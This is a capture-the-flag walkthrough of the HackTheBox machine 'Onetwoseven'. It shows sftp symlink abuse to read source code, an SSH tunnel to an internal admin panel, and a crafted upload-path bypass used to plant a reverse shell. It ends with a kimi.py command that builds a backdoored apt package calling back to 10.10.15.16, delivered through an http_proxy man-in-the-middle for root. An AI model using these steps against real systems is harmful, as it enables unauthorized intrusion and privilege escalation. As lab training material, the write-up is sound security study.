HackTheBox - Onetwoseven

Summary

Onetwoseven,a Linux box created by HackTheBox user jkr, was an overall hard difficulty box.I really enjoy this box.The foothold for this Linux box craftily utilizes symbolic links and port forwarding through sftp to gain access to the admin interface. This ultimately leads to RCE and a shell after some addon-based web exploitation. For escalating to the root user, we take advantage of the available apt sudo commands while performing a man-in-the-middle package injection via http-proxy.

Enumeration

Let’s Start with Enumarating the ports.
Using:

1
nmap -sC -sV 10.10.10.133

Seeing the nmap result we find only two ports are open 22 and 80.

Lets see what is there on port 80 first.

Opening 10.10.10.133 in web browser we see

Digging down we found signup page to be interesting.

Getting User

Lets open the link after adding onetwoseven.htb in /etc/hosts

It look like a blank page. Connecting via sftp using

1
sftp ots-mYmNIODU@10.10.10.133

and listing the files we see

looking in man inside that shell we see we can symlink files
lets try symlinking signup.php and removing index.html inside public_html folder

and viewing the page we can see the signup.php code.

Seeing the code we find the logic for creating user.
Let’s try creating user with $ip=127.0.0.1

Logging to SFTP server with this credentials give us user.txt

So, we can get user.txt and read it.

Low-Privilege Shell

Enumerating the web site we also find port 60080 is opened internaly and the admin server is listening there.

Lets try to create a ssh tunnel to that.

1
ssh -N -L 60080:127.0.0.1:60080 ots-yODc2NGQ@10.10.10.133

Lets visit the admin page we see the login.php. Lets try symlink-ing it in the sftp and viewing the code for that.

We find the username is ots-admin and we see the password hash.
Cracking it on crackstation.net we get the password.

Logging in with these credentials to the admin page.

We see we can upload plugin’s download plugins.

Downloading ots-man-addon.php we see the rules to upload download and Apache Rewrite

Reading the code we see we have to satisfy two conditions to upload the plugin.
Which we satisfy with

1
POST /addon-download.php?a=/addon-upload.php/

Using which we upload the Reverse shell.

Executing the uploaded shell we get the Reverse shell as www-admin.

Privilege Escalation

Doing sudo -l we see

we are allowed to do apt-get update and apt-get upgrade without password. We also see that http_proxy is also pass to the sudo.
So we can try to proxy that and perform a MITM attack.

I used kimi.py to create a backdoor.

1
python kimi.py -n nano -l 10.10.15.16 -p 9000 -u 10.10.15.16 -V 2.7.5 -a amd64

and used dpkg-scanpackage to create a Pacakge.gz

and created the repo with this as the structure.

and used python to start a http server on port 80 with.

1
$ python -m SimpleHTTPServer 80

doing sudo apt-get update and sudo apt-get upgrade we see our backdoor-ed package is there to install.

And we get the metasploit session and we can use that to grab the

And we completed onetwoseven

Related Posts: